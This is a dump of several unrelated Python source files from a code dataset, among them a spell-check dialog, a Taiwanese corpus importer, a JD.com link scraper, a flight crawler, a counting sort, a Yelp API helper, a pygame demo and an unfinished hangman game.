onReplaceWordKeyPressed\r\n\r\n def onSuggestionListSelection(self, event): #@UnusedVariable\r\n if self.suggestionsCntrl.GetStringSelection():\r\n self.replacewordCntrl.SetValue(self.suggestionsCntrl.GetStringSelection())\r\n # end onSuggestionListSelection\r\n\r\n def onSuggestionListDoubleClick(self, event): #@UnusedVariable\r\n if self.suggestionsCntrl.GetStringSelection():\r\n self.replacewordCntrl.SetValue(self.suggestionsCntrl.GetStringSelection())\r\n self._doReplace(False)\r\n # end onSuggestionListDoubleClick\r\n\r\n#end ZSpellCheckDialog\r\n\r\n\r\n\r\n","sub_path":"src/python/zoundry/blogapp/ui/dialogs/spellcheckdialog.py","file_name":"spellcheckdialog.py","file_ext":"py","file_size_in_byte":10103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"59973245","text":"# -*- coding: utf-8 -*-\n\"\"\"\n著作權所有 (C) 民國103年 意傳文化科技\n開發者:薛丞宏\n網址:http://意傳.台灣\n語料來源:請看各資料庫內說明\n\n本程式乃自由軟體,您必須遵照SocialCalc設計的通用公共授權(Common Public Attribution License, CPAL)來修改和重新發佈這一程式,詳情請參閱條文。授權大略如下,若有歧異,以授權原文為主:\n\t1.得使用、修改、複製並發佈此程式碼,且必須以通用公共授權發行;\n\t2.任何以程式碼衍生的執行檔或網路服務,必須公開該程式碼;\n\t3.將此程式的原始碼當函式庫引用入商業軟體,且不需公開非關此函式庫的任何程式碼\n\n此開放原始碼、共享軟體或說明文件之使用或散佈不負擔保責任,並拒絕負擔因使用上述軟體或說明文件所致任何及一切賠償責任或損害。\n\n臺灣言語工具緣起於本土文化推廣與傳承,非常歡迎各界用於商業軟體,但希望在使用之餘,能夠提供建議、錯誤回報或修補,回饋給這塊土地。\n\n感謝您的使用與推廣~~勞力!承蒙!\n\"\"\"\nfrom 臺灣言語工具.資料庫.資料庫連線 import 資料庫連線\nimport xlrd\n\nclass 數位典藏文本段落轉逝:\n\t到逝=True\n\t揣數位典藏文本段資料庫 = 資料庫連線.prepare('SELECT \"id\",\"檔案名\",\"漢羅\",\"全羅\",\"漢羅逝\",\"全羅逝\" '+\n\t\t'FROM \"台語文數位典藏\".\"改過段落資料\" ' +\n\t\t'WHERE LOWER(\"檔案名\") LIKE LOWER($1)')\n# \t揣數位典藏文本段資料庫 = 資料庫連線.prepare('SELECT \"id\",\"檔案名\" '+\n# \t\t'FROM \"台語文數位典藏\".\"改過段落資料\" ' +\n# \t\t'WHERE LOWER(\"檔案名\") LIKE LOWER($1)')\n\t插入台語數位典藏文本資料庫 = 資料庫連線.prepare('INSERT INTO \"台語文數位典藏\".\"��始逝資料\" ' 
+\n\t\t'(\"流水號\",\"時代\",\"年\",\"類\",\"類二\",\"漢羅標\",\"全羅標\",\"漢羅名\",\"全羅名\",\"檔案名\",\"漢羅文\",\"全羅文\",\"漢羅逝\",\"全羅逝\") '+\n\t\t'VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14)')\n\t插入修改數位典藏文本資料庫 = 資料庫連線.prepare('INSERT INTO \"台語文數位典藏\".\"改過逝資料\" ' +\n\t\t'(\"流水號\",\"時代\",\"年\",\"類\",\"類二\",\"漢羅標\",\"全羅標\",\"漢羅名\",\"全羅名\",\"檔案名\",\"漢羅文\",\"全羅文\",\"漢羅逝\",\"全羅逝\") '+\n\t\t'VALUES ($1,$2,$3,$4,$5,$6,$7,$8,$9,$10,$11,$12,$13,$14)')\n\t目錄檔='/dev/shm/pbk.xls'\n\tdef __init__(self):\n\t\t表格檔=xlrd.open_workbook(self.目錄檔)\n\t\tfor 表格名 in 表格檔.sheet_names():\n\t\t\t表格=表格檔.sheet_by_name(表格名)\n\t\t\tprint(表格.row_values(0))\n\t\t\t段落流水號={}\n\t\t\t狀況={}\n\t\t\tfor 第幾逝 in range(1,表格.nrows):\n\t\t\t\t資料=表格.row_values(第幾逝)\n\t\t\t\tif 資料[-1] == 'XXX':\n\t\t\t\t\tcontinue\n\t\t\t\t目錄流水號,全羅標,漢羅標,年,全羅名,漢羅名,時代,類,類二=資料[:9]\n\t\t\t\t目錄流水號=int(目錄流水號)\n\t\t\t\tif isinstance(年, float):\n\t\t\t\t\t年=int(年)\n\t\t\t\tif isinstance(年, int):\n\t\t\t\t\t年=str(年)\n\t\t\t\t\n\t\t\t\t#{0: 649, 1: 1505, 2: 8, 4: 1}\n\t\t\t\t#L{1: 2149, 2: 11, 3: 2, 5: 1}//段落流水號1:2139 2:16\n\t\t\t\t可能檔名='%{0}%{1}%{2}%{3}%{4}%{5}%'.format(時代,年,類,年,全羅名,全羅標)\n\t\t\t\t\n\t\t\t\t#{0: 11, 1: 2138, 2: 12, 3: 1, 4: 1}\n\t\t\t\t#L{1: 2147, 2: 13, 3: 2, 5: 1}\n# \t\t\t\t可能檔名='%{0}%{1}%{2}%'.format(年,全羅名,全羅標)\n\n\t\t\t\t#L{1: 2156, 2: 6, 3: 1}\n\t\t\t\t可能檔名='%{0}%{1}%{2}%{3}%{4}%{5}.%'.format(時代,年,類,年,全羅名,全羅標)\n\t\t\t\t#L{1: 2163}\n\t\t\t\t可能檔名='%{0}%{1}%{2}%{3}%{4}.{5}.%'.format(時代,年,類,年,全羅名,全羅標)\n\t\t\t\t#{0: 11, 1: 2152}\n# \t\t\t\t可能檔名='%{0}%{1}%%{3}%{4}.{5}.%'.format(時代,年,類,年,全羅名,全羅標)\n\n\t\t\t\t段資料=list(self.揣數位典藏文本段資料庫(可能檔名))\n\t\t\t\tfor 段 in 段資料:\n\t\t\t\t\t段流水號=段[0]\n\t\t\t\t\tif 段流水號 not in 段落流水號:\n\t\t\t\t\t\t段落流水號[段流水號]=0\n\t\t\t\t\t段落流水號[段流水號]+=1\n\t\t\t\t\n\t\t\t\t新狀況=len(段資料)\n\t\t\t\tif 新狀況 not in 狀況:\n\t\t\t\t\t狀況[新狀況]=0\n\t\t\t\t狀況[新狀況]+=1\n\t\t\t\tif 新狀況!=1:\n\t\t\t\t\tprint(目錄流水號,可能檔名)\n\t\t\t\t\tprint(新狀況,段資料)\n\t\t\t\t\t\n\t\t\t\tif self.到逝:\n\t\t\t\t\t段流水號,檔案名,漢羅文,全羅文,漢羅逝,全羅逝=段資料[0]\n# \t\t\t\t\t流水號\",\"時代\",\"年\",\"類\",\"類二\",\"漢羅標\",\"全羅標\",\"漢羅名\",\"全羅名\",\"檔案名\",\"漢羅文\",\"全羅文\",\"漢羅逝\",\"全羅逝\n\t\t\t\t\tif '
' in 漢羅文 or '\u2028' in 全羅文 or '\u2029' in 漢羅文 or '\u2029' in 全羅文:\n\t\t\t\t\t\t漢羅文=漢羅文.replace('\\n','\\n\\n').replace('\u2028','\\n').replace('\u2029','\\n')\n\t\t\t\t\t\t全羅文=全羅文.replace('\\n','\\n\\n').replace('\u2028','\\n').replace('\u2029
','\\n')\n\t\t\t\t\t漢羅文=漢羅文.strip().split('\\n')\n\t\t\t\t\t全羅文=全羅文.strip().split('\\n')\n\t\t\t\t\tfor 所在 in range(len(漢羅文)):\n\t\t\t\t\t\t漢羅文[所在]=漢羅文[所在].strip()\n\t\t\t\t\tfor 所在 in range(len(全羅文)):\n\t\t\t\t\t\t全羅文[所在]=全羅文[所在].strip()\n\t\t\t\t\t漢羅逝,全羅逝=len(漢羅文),len(全羅文)\n\t\t\t\t\t漢羅文='\\n'.join(漢羅文)\n\t\t\t\t\t全羅文='\\n'.join(全羅文)\n# \t\t\t\t\t目錄流水號,全羅標,漢羅標,年,全羅名,漢羅名,時代,類,類二=資料[:9]\n# \t\t\t\t\tprint(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅文,全羅文,漢羅逝,全羅逝)\n# \t\t\t\t\tprint(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅逝,全羅逝)\n\t\t\t\t\tself.插入台語數位典藏文本資料庫(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅文,全羅文,漢羅逝,全羅逝)\n\t\t\t\t\tself.插入修改數位典藏文本資料庫(目錄流水號,時代,年,類,類二,漢羅標,全羅標,漢羅名,全羅名,檔案名,漢羅文,全羅文,漢羅逝,全羅逝) \n\t\t\tprint(狀況)\n\t\t\tprint(段落流水號)\n\t\t\tprint(len(段落流水號))\n\t\t\tfor 號 in range(2,2171):\n\t\t\t\tif 號 not in 段落流水號:\n\t\t\t\t\tprint('無:',號)\n\t\t\tfor 號 in range(2,2171):\n\t\t\t\tif 號 not in 段落流水號:\n\t\t\t\t\tpass\n\t\t\t\telif 段落流水號[號]>1:\n\t\t\t\t\tprint('二个以上:',號)\n\nif __name__ == '__main__':\n\t數位典藏文本段落轉逝()\n","sub_path":"舊臺灣言語工具/資料佮語料匯入整合/數位典藏/數位典藏文本段落轉逝.py","file_name":"數位典藏文本段落轉逝.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"530238084","text":"# -*- coding:utf-8 -*-\nimport time, random, logging, os\nfrom selenium import webdriver\nfrom fake_useragent import UserAgent\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\n\n# Begin\nkeyword = input(\"请输入关键词文件名!\")\nprint('\\n关键词为:{}'.format(keyword))\n# 随机头部,不显示测试,禁止gpu\nchrome_options = webdriver.ChromeOptions()\nchrome_options.add_argument('disable-infobars')\nchrome_options.add_argument('disable-gpu')\nchrome_options.add_argument('useragent=\"{}\"'.format(UserAgent().random))\n# chrome_options.add_argument('proxy-server=http://121.231.155.108:6666')\ndriver = webdriver.Chrome(chrome_options=chrome_options)\nwait = WebDriverWait(driver, 15)\ndriver.get(url='https://www.jd.com/')\ntime_start = time.time()\ntime.sleep(random.randint(2, 3))\nlink_file = open(\"京东sort{}.txt\".format(keyword), \"w\")\n\ndef isExist(rule):\n try:\n driver.find_element_by_xpath(rule)\n return True\n except:\n return False\n\ndef loaditem():\n # 翻三次使全部加载\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight/2)')\n time.sleep(random.randint(1, 3))\n driver.execute_script('window.scrollTo(0, document.body.scrollHeight*7/10)')\n time.sleep(random.randint(1, 3))\n target = driver.find_element_by_id(\"J_bottomPage\")\n driver.execute_script(\"arguments[0].scrollIntoView();\", target)\n time.sleep(random.randint(1, 2))\n\ndef pagedown():\n if isExist('//a[@class=\"pn-next\"]'):\n next_btn = driver.find_element_by_xpath('//a[@class=\"pn-next\"]')\n next_btn.click()\n time.sleep(random.randint(2, 3))\n else:\n pass\n\ndef getlink(total_page, link_file):\n for q in range(int(total_page)):\n loaditem()\n if isExist('//*[@id=\"message_layer\"]'):\n msg_24g = driver.find_element_by_id(\"message_layer\")\n while msg_24g.is_displayed():\n time.sleep(1)\n print(\"有弹窗\")\n else:\n pass\n # 获取和写入链接\n if isExist('//li[@class=\"gl-item\"]/div/div[@class=\"p-img\"]/a'):\n parents = driver.find_elements_by_xpath('//li[@class=\"gl-item\"]/div/div[@class=\"p-img\"]/a')\n print('第{}页-共{}个元素'.format(q+1, len(parents)))\n for i in 
range(len(parents)):\n url = parents[i].get_attribute('href')\n link_file.write(url+\"\\n\")\n # 输入翻至下一页\n if q+1 < int(total_page):\n pagedown()\n\ndef start():\n try: # 关键词填入框中并点击>>>获取总页数>>>拉到底部点击下一页>>>抽取所需要的信息\n search = wait.until(EC.presence_of_element_located((By.XPATH, '//input[@clstag=\"h|keycount|head|search_a\"]')))\n search.clear()\n search.send_keys(keyword)\n if isExist('//button[@clstag=\"h|keycount|head|search_c\"]'):\n sub_btn = wait.until(EC.element_to_be_clickable((By.XPATH, '//button[@clstag=\"h|keycount|head|search_c\"]')))\n sub_btn.click()\n time.sleep(random.randint(2, 3))\n else:\n pass # 备用\n # 筛选排序标签\n sort_span = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id=\"J_filter\"]/div[1]/div[1]/a[2]/span')))\n sort_span.click()\n time.sleep(0.2)\n total_page = wait.until(EC.presence_of_element_located((By.XPATH, '//span[@class=\"fp-text\"]'))).text.split('/')[-1]\n print(\"详情数据总共{}页\".format(total_page))\n getlink(total_page, link_file)\n time_end = time.time()\n time_cost = time_end-time_start\n print('京东{}页-{}链接已全部写入!\\n'.format(total_page, keyword))\n print('本次花费{}分{}秒'.format(time_cost//60, time_cost%60))\n print('>>>>>>>>>>All Done!<<<<<<<<<<<')\n except Exception as e:\n print(e)\n\nif __name__ == \"__main__\":\n start()\n link_file.close()","sub_path":"Proj_getData/GetLink/jd_sort_100.py","file_name":"jd_sort_100.py","file_ext":"py","file_size_in_byte":4147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"627378311","text":"# -*- coding:utf-8 -*-\r\n\r\n\r\n# @version: 1.0\r\n# @author: daichi\r\n# @date: '14-12-08'\r\n\r\n\r\nimport os\r\nimport zipfile\r\n\r\nfrom yzs_utils.environment import Environment\r\nfrom dao.export_sql_helper import ExportSqlHelper\r\nfrom flight_crawler.flight_schedule_crawler import FlightScheduleCrawler\r\nfrom util.flight_data_exporter import FlightDataExporter\r\nfrom util.uploader import Uploader\r\n\r\n\r\ndef export_sql():\r\n sql_name = ExportSqlHelper.exportSql()\r\n zip_file(sql_name, sql_name.replace('.sql', '.zip'))\r\n\r\n\r\ndef zip_file(file_name, zip_file_name):\r\n z = zipfile.ZipFile(zip_file_name, 'w', zipfile.ZIP_DEFLATED)\r\n z.write(file_name)\r\n os.remove(file_name)\r\n\r\n\r\ndef upload(file_name):\r\n uploader = Uploader()\r\n for retry_time in range(3):\r\n if uploader.upload_file(file_name, \"flight\"):\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n Environment.get_instance().init_by_file_name(os.getcwd(), \"flight_crawler_main.py\")\r\n crawler = FlightScheduleCrawler(\"conf/qunar_configure.conf\", \"conf/ctrip_configure.conf\", loggingConfigureFileName=\"conf/logging.conf\")\r\n crawler.run()\r\n flight_data_exporter = FlightDataExporter(\"conf/configure.conf\")\r\n export_file_name = flight_data_exporter.export()\r\n upload(export_file_name)\r\n\r\n\r\n\r\n","sub_path":"data-auto-updater-projects/flight_schedule/flight_crawler_main.py","file_name":"flight_crawler_main.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"173787780","text":"from random import randint\nfrom copy import deepcopy\n\nmax_array_size = 100\n\n\ndef estimatetime(func):\n from time import perf_counter\n\n def wrapper(*args, **kwargs):\n st_time = perf_counter()\n ret = func(*args, **kwargs)\n e_time = perf_counter() - st_time\n print('*' * 40)\n print('Time Estimation --')\n print('Method name : ' + str(func.__name__))\n print('Estimated time : ' + str(e_time))\n 
print('*' * 40)\n return ret\n\n return wrapper\n\n\n@estimatetime\ndef counting_sort(array: list):\n \"\"\"\n 計数ソート\n 計算量 O(n + k)\n \"\"\"\n maxp = max(array)\n newarr = [0] * (maxp)\n pos = [0] * (maxp)\n pos[0] = 0\n\n for i in array:\n newarr[i - 1] += 1\n\n for i in range(1, maxp):\n pos[i] = pos[i - 1] + newarr[i - 1]\n\n answer = [None] * (len(array))\n\n for k in range(0, len(array)):\n target = array[k]\n answer[pos[target-1]] = target\n pos[target-1] += 1\n\n return answer\n\n\ngenerated_array = [randint(1, 5) for i in range(0, (max_array_size))]\n\ncopied = deepcopy(generated_array)\nsorted_array = counting_sort(copied)\ngenerated_array.sort()\n\nprint('Sorted array : ' + str(generated_array))\nprint('Sorted array : ' + str(sorted_array))\nprint('is sorting completely done? : ' + str(generated_array == sorted_array) )","sub_path":"algorithms/counting_sort.py","file_name":"counting_sort.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"486117300","text":"def getIdx(cha):\n return ord(cha) - 64\n\ndef solution(msg):\n answer = []\n dictionary = [[] for _ in range(27)]\n\n idx = 0\n\n while idx < len(msg):\n #한글자식 비교하면서 등록되어 있는지 확인한다\n nowIdx = getIdx(msg[idx])\n nowDict = dictionary[nowIdx]\n \n while idx < len(msg):\n next = False\n idx += 1\n \n #마지막 글자라면 어차피 다음에 탐색할게 없으니 종료한다\n if idx >= len(msg):\n break\n\n for nextChar, nextIdx in nowDict:\n if nextChar == msg[idx]:\n next = True\n nowDict = dictionary[nextIdx]\n nowIdx = nextIdx\n break\n \n if not next:\n #다음 문자가 없으면 해당 문자를 추가해준다\n nowDict.append([msg[idx], len(dictionary)])\n dictionary.append([])\n break\n \n answer.append(nowIdx)\n\n return answer\n\nprint(solution(\"KAKAO\"))\nprint(solution(\"TOBEORNOTTOBEORTOBEORNOT\"))\nprint(solution(\"ABABABABABABABAB\"))","sub_path":"PROGRAMMERS/Level 2/[3차] 압축_python/CodingTest.py","file_name":"CodingTest.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"203385947","text":"import numpy as np\nimport utils\nimport os\nimport re\n\n\ndef get_dag_galaxy():\n node_names = ['Y{}'.format(i) for i in range(20)]\n\n n = len(node_names)\n adj_matrix = np.zeros((n, n))\n\n path = r'C:\\Users\\gtx97\\Google Drive\\2019-2020_2_UNC_DATA\\acflow\\AstarLasso\\networks'\n with open(os.path.join(path, 'getDAGgalaxy.m'), 'r') as file:\n data = file.readlines()\n\n string = ''.join(data)\n\n pattern = r'\\(\\d+\\,\\d+\\)'\n\n res = re.findall(pattern, string)\n\n res = [x[1:-1].split(',') for x in res]\n res = [[int(a) - 1 for a in x] for x in res]\n res = np.array(res)\n rows, cols = np.split(res, indices_or_sections=2, axis=1)\n adj_matrix[rows, cols] = 1\n\n top_order = utils.topological_permutation(adj_matrix)\n\n return adj_matrix, node_names, top_order\n","sub_path":"networks/get_dag_galaxy.py","file_name":"get_dag_galaxy.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"197219798","text":"def yelp_request(host, path, api_key, url_params=None):\n import requests\n\n #prepare request\n url_params = url_params or {}\n url = '{0}{1}'.format(host, path)\n headers = {'Authorization': 'Bearer %s' %api_key}\n\n #print status\n #print(u'Querying {0} ...'.format(url))\n\n #make the request\n response = requests.get(url=url, params=url_params, headers=headers)\n\n return response.json()\n\n\ndef 
yelp_num_records(yelp_key, lat, lon, category):\n import pandas as pd\n import numpy as np\n import os\n\n base_path = 'https://api.yelp.com'\n search_path = '/v3/businesses/search'\n #business_path = '/v3/businesses/' #business ID comes after this\n\n #Set the initial search parameters\n search_params = {'latitude': lat,\n 'longitude': lon,\n 'radius': 16094,\n 'limit': 50,\n 'offset': 0,\n 'categories': category,\n 'term': None,\n 'price': [1,2,3,4]}\n\n #Change price parameters based on category\n if (category == 'restaurants') | (category == 'bars'):\n search_params.update({'price': [2,3,4]})\n else:\n pass\n\n #Query the API to find the total number of businesses that meet search parameters\n try:\n num_records = yelp_request(host=base_path, path=search_path, api_key=yelp_key, url_params=search_params)['total']\n except:\n num_records = np.NaN\n\n return num_records\n\n\ndef yelp_ratings(yelp_key, num_records):\n import pandas as pd\n import numpy as np\n import os\n import requests\n from python_pkg import python_udf as udf\n\n base_path = 'https://api.yelp.com'\n search_path = '/v3/businesses/search'\n business_path = '/v3/businesses/' #business ID comes after this\n\n #initialize everything needed for loops\n offset_value = 0\n output = {}\n\n #Because API only returns a subset of the total businesses, must call the API repeatedly to get everything\n while offset_value <= num_records:\n #query the API\n request_output = request(host=base_path, path=search_path, api_key=yelp_key, url_params=search_params)\n\n #loop through all entities in the request\n for b in request_output['businesses']:\n #initialize a dictionary to hold the data for the specific business\n specific_dict = {}\n name = b['alias']\n specific_dict['review_count'] = b['review_count']\n specific_dict['rating'] = b['rating']\n #add specific business to the overall dictionary using the business name as the key\n output[name] = specific_dict\n\n #update counter\n offset_value += search_params['limit']\n #update search parameters\n search_params.update({'offset': offset_value})\n\n #convert to dataframe\n df = pd.DataFrame(output).transpose().reset_index().astype({'rating': 'category', 'review_count': 'int64'})\n\n\n\n rating_df = df.groupby(by='rating', as_index=False).agg({'review_count': 'sum'})\n\n rating_df['weight'] = rating_df['review_count'] / rating_df['review_count'].sum()\n sum(rating_df['rating'].astype('float64') * rating_df['weight'])\n\n\n\n grouped_df = df.groupby(by='rating').agg({'rating': 'count', 'review_count': 'sum'}).rename(columns={'rating': 'rating_count'})\\\n .reset_index().astype({'rating': 'float64'})\n grouped_df['review_per_business'] = grouped_df['review_count'] / grouped_df['rating_count']\n avg_rating = sum(grouped_df['rating'] * (grouped_df['rating_count'] / grouped_df['rating_count'].sum()))\n\n sum(avg_rating * (grouped_df['review_per_business'] / grouped_df['review_per_business'].sum()))\n\n\n\n\n# from python_pkg import python_udf as udf\n# yelp_key = udf.read_key('C:/Users/Joe/Documents/API_keys.json', 'yelp')\n# lat = [32.7157, 43.0731]\n# lon = [-117.1611, -89.4012]\n# category = 'restaurants'\n\n# for la, lo in zip(lat, lon):\n# print(yelp_num_records(yelp_key, la, lo, category))\n\nif __name__ == \"__main__\":\n pass\n","sub_path":"data_pipelines/yelp.py","file_name":"yelp.py","file_ext":"py","file_size_in_byte":4101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"310443192","text":"import pygame\nimport sys\nimport 
os\n\n'''\nObjects\n'''\n\n\nclass Player(pygame.sprite.Sprite):\n '''\n 生成玩家\n '''\n\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.movex = 0\n self.movey = 0\n self.frame = 0\n self.images = []\n for i in range(1, 5):\n img = pygame.image.load(os.path.join('images', 'hero' + str(i) + '.png')).convert()\n img.convert_alpha()\n img.set_colorkey(ALPHA)\n self.images.append(img)\n self.image = self.images[0]\n self.rect = self.image.get_rect()\n\n def control(self, x, y):\n '''\n 控制玩家移动\n '''\n self.movex += x\n self.movey += y\n\n def update(self):\n '''\n 更新妖精位置\n '''\n\n self.rect.x = self.rect.x + self.movex\n self.rect.y = self.rect.y + self.movey\n\n # 向左移动\n if self.movex < 0:\n self.frame += 1\n if self.frame > 3 * ani:\n self.frame = 0\n self.image = self.images[self.frame // ani]\n\n # 向右移动\n if self.movex > 0:\n self.frame += 1\n if self.frame > 3 * ani:\n self.frame = 0\n self.image = self.images[(self.frame // ani) + 4]\n\n\n'''\n设置\n'''\nworldx = 960\nworldy = 720\n\nfps = 40 # 帧刷新率\nani = 4 # 动画循环\nclock = pygame.time.Clock()\npygame.init()\nmain = True\n\nBLUE = (25, 25, 200)\nBLACK = (23, 23, 23)\nWHITE = (254, 254, 254)\nALPHA = (0, 255, 0)\n\nworld = pygame.display.set_mode([worldx, worldy])\nbackdrop = pygame.image.load(os.path.join('images', 'stage.png')).convert()\nbackdropbox = world.get_rect()\nplayer = Player() # 生成玩家\nplayer.rect.x = 0\nplayer.rect.y = 0\nplayer_list = pygame.sprite.Group()\nplayer_list.add(player)\nsteps = 10 # 移动速度\n\n'''\n主循环\n'''\nwhile main == True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit();\n sys.exit()\n main = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT or event.key == ord('a'):\n player.control(-steps, 0)\n if event.key == pygame.K_RIGHT or event.key == ord('d'):\n player.control(steps, 0)\n if event.key == pygame.K_UP or event.key == ord('w'):\n print('jump')\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == ord('a'):\n player.control(steps, 0)\n if event.key == pygame.K_RIGHT or event.key == ord('d'):\n player.control(-steps, 0)\n if event.key == ord('q'):\n pygame.quit()\n sys.exit()\n main = False\n\n # world.fill(BLACK)\n world.blit(backdrop, backdropbox)\n player.update()\n player_list.draw(world) # 更新玩家位置\n pygame.display.flip()\n clock.tick(fps)\n","sub_path":"myflask/venv/gametest.py","file_name":"gametest.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"137399951","text":"import networkx as nx\nimport parse as p\nfrom random import random, choice\n\nG = nx.Graph()\npath = \"inputsSubmission/\"\ninputs = {\"25.in\": 25, \"50.in\": 50, \"100.in\": 100}\n\nfor filename, size in inputs.items():\n G.add_nodes_from(range(size))\n while not nx.is_connected(G):\n start = choice(list(G.nodes()))\n end = choice(list(nx.non_neighbors(G, start)))\n weight = round(random() * 100, 3)\n G.add_edge(start, end)\n G[start][end]['weight'] = weight\n print(\"=== \" + filename + \" ===\")\n print(\"Graph has \" + str(len(list(G.nodes()))) + \" nodes and \" + str(len(list(G.edges()))) + \" edges.\")\n print(\"Graph is connected: \" + str(nx.is_connected(G)))\n print(\"Write to file: \" + path + filename)\n p.write_input_file(G, path + filename)\n G.clear()\n 
print()\n\n\n\n\n\n","sub_path":"inputsSubmission.py","file_name":"inputsSubmission.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"493470472","text":"# Write your code here\nfrom random import choice\n\nprint(\"H A N G M A N\\n\")\n\nlist_of_words = ['python', 'java', 'kotlin', 'javascript']\nthe_word = choice(list_of_words)\n\n\"\"\"\nhint = ''\nfor index, character in enumerate(the_word):\n if index <= 2:\n hint += character\n else:\n hint += '-'\n# test hint\n# print(hint)\n\nuser_guess = input(\"Guess the word {hint}: \".format(hint=hint))\n\"\"\"\nstarting_hint = ''\nfor index, character in enumerate(the_word):\n starting_hint += '-'\n\n\n\nnum_letter_to_guess = len(the_word)\nnum_tries = 8\nuser_attempts = 0\nitter_count = 0\nhint = []\n# rename later : hold correct user guesses\nuser_letters_guess_list = []\n# rename later: hold incorrect user guess\nall_guess = []\nis_guess_complete = False\nexit_message = \"Thanks for playing\\nWe'll see how well you did in the next stage\"\nstart_game = False\nis_deciding_to_play = True\n# menu\nwhile is_deciding_to_play:\n player_decision_to_play = input(\"Type \\\"play\\\" to play the game,\\\"exit\\\" to quit:\")\n if player_decision_to_play == 'play':\n # set start game bool to true to activate the game loop\n start_game = True\n # set is_deciding_to_play to false, to exit the start game menu\n is_deciding_to_play = False\n elif player_decision_to_play == 'exit':\n # don't start the game, but do exit the game menu\n is_deciding_to_play = False\n else:\n # gave an answer other than the two options re-prompt question\n continue\n\n\n# game loop\nwhile user_attempts < num_tries and start_game:\n #print(\"value of user_attemps\", user_attempts)\n # check if user guess is complete\n # num check will be used to count the number correct guess\n # being currently made\n num_check = 0\n for letter in the_word:\n if letter in user_letters_guess_list:\n num_check += 1\n\n # when num check is equal to the length of the word\n if num_check == len(the_word):\n # set ... 
to true\n is_guess_complete = True\n\n # reset num_letter_to_guess to redo the calc or\n # else the result will go into negative\n num_letter_to_guess = len(the_word)\n for index, letter in enumerate(user_letters_guess_list):\n if letter in the_word:\n num_letter_to_guess -= 1\n # print(\"is_guess_complete value: \", is_guess_complete)\n # print(\"num_letter_to_guess: \", num_letter_to_guess)\n\n if num_letter_to_guess == 0:\n # print(\"num_letter_to_guess: \", num_letter_to_guess)\n # print(\"is_guess_complete value: \", is_guess_complete)\n is_guess_complete = True\n\n if is_guess_complete:\n user_attempts += 1\n else:\n # handle user input loop\n # print the guess\n try: hint_string\n except NameError:\n print(starting_hint)\n else:\n print(hint_string.strip())\n\n # ask for input\n user_letter_guess = input(\"Input a letter:\").rstrip()\n if len(user_letter_guess) != 1 or not(user_letter_guess.isalpha() and user_letter_guess.islower()):\n # enter the correct message based on the wrong formatting\n if len(user_letter_guess) != 1:\n print(\"You should input a single letter\")\n if not(user_letter_guess.isalpha() and user_letter_guess.islower()):\n print(\"Please enter a lowercase English letter\")\n\n if not(is_guess_complete) and user_attempts != 8:\n print()\n # print(\"a\")\n # start the game loop over input is not right\n continue\n else:\n # print(\"passed checking input, starting game\")\n # input is good, continue with the game loop\n # check if the letter has already been guessed\n if user_letter_guess in user_letters_guess_list or user_letter_guess in all_guess:\n print(\"You've already guessed this letter\")\n if not(is_guess_complete) and user_attempts != 8:\n print()\n #print('b')\n # restart input, letter's already been guessed\n # print()\n continue\n\n # letter has not been guessed yet, continue the game\n # for format create a newline between input and guess\n \"\"\"\n need to count the occurnes of the user_letter_guess\n in the_word and add it to the \n user_letters_guess_list that many times\n should be able to use .count method for that.\n \"\"\"\n for num_adds in range(the_word.count(user_letter_guess)):\n user_letters_guess_list.append(user_letter_guess)\n # print(user_letters_guess_list)\n # test it\n else:\n # if it doesn't show up in the word then add it to\n all_guess.append(user_letter_guess)\n\n if user_letter_guess in the_word:\n # print(\"letter is in the word\")\n if not(is_guess_complete) and user_attempts != 8:\n # hint\n try: hint_string\n except NameError:\n print()\n else:\n \"\"\"\n count number of blanks left in hint\n hint_string.count('-')\n count the number of time the user_guess_letter\n shows up in the word\n the_word.count(user.guess_letter)\n \n if they are equal then it's the final correct guess\n so don't print the empty line\n \"\"\"\n if hint_string.count('-') != the_word.count(user_letter_guess):\n print()\n #print('c')\n # create hint\n if len(hint) == 0:\n # print(\"len hint is\", len(hint))\n for index, character in enumerate(the_word):\n if user_letter_guess == character:\n hint.append(character)\n else:\n hint.append('-')\n else:\n for word_index, word_letter in enumerate(the_word):\n if user_letter_guess == word_letter:\n # hint.insert(word_index, user_letter_guess)\n hint[word_index] = user_letter_guess\n # print(hint)\n\n hint_string = ''\n for letter in hint:\n hint_string += letter\n\n # check hint string\n # 